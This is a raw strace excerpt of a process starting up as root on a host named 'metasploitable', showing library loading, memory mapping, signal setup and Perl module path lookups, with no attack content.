11569 20:18:02.441835 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512
11569 20:18:02.442005 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0
11569 20:18:02.442057 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d4b000
11569 20:18:02.442085 mmap2(0xb7e94000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7e94000
11569 20:18:02.442134 mmap2(0xb7e97000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7e97000
11569 20:18:02.442184 close(1)          = 0
11569 20:18:02.442215 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11569 20:18:02.442275 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1
11569 20:18:02.442290 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512
11569 20:18:02.442492 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0
11569 20:18:02.442511 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d19000
11569 20:18:02.442523 mmap2(0xb7d22000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d22000
11569 20:18:02.442539 mmap2(0xb7d24000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d24000
11569 20:18:02.442552 close(1)          = 0
11569 20:18:02.442591 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d18000
11569 20:18:02.442605 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d188c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
11569 20:18:02.442666 mprotect(0xb7e94000, 4096, PROT_READ) = 0
11569 20:18:02.442693 munmap(0xb7edc000, 29913) = 0
11569 20:18:02.442707 set_tid_address(0xb7d18908) = 11569
11569 20:18:02.442716 set_robust_list(0xb7d18910, 0xc) = 0
11569 20:18:02.442725 futex(0xbfa31ed0, 0x81 /* FUTEX_??? */, 1) = 0
11569 20:18:02.442739 rt_sigaction(SIGRTMIN, {0xb7e9e2c0, [], SA_SIGINFO}, NULL, 8) = 0
11569 20:18:02.442753 rt_sigaction(SIGRT_1, {0xb7e9e340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0
11569 20:18:02.442765 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0
11569 20:18:02.442779 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0
11569 20:18:02.442798 uname({sys="Linux", node="metasploitable", ...}) = 0
11569 20:18:02.442845 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0
11569 20:18:02.442891 brk(0)            = 0x8153000
11569 20:18:02.442901 brk(0x8174000)    = 0x8174000
11569 20:18:02.442944 getuid32()        = 0
11569 20:18:02.442954 geteuid32()       = 0
11569 20:18:02.442964 getgid32()        = 0
11569 20:18:02.442973 getegid32()       = 0
11569 20:18:02.443057 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7cf7000
11569 20:18:02.443084 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1
11569 20:18:02.443102 read(1, "\316\214\214\224", 4) = 4
11569 20:18:02.443116 close(1)          = 0
11569 20:18:02.443134 time(NULL)        = 1495671482
11569 20:18:02.443180 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbfa31ba0) = -1 ENOENT (No such file or directory)
11569 20:18:02.443199 stat64("/usr/local/lib/site_perl/5.8.8", 0xbfa31ba0) = -1 ENOENT (No such file or directory)
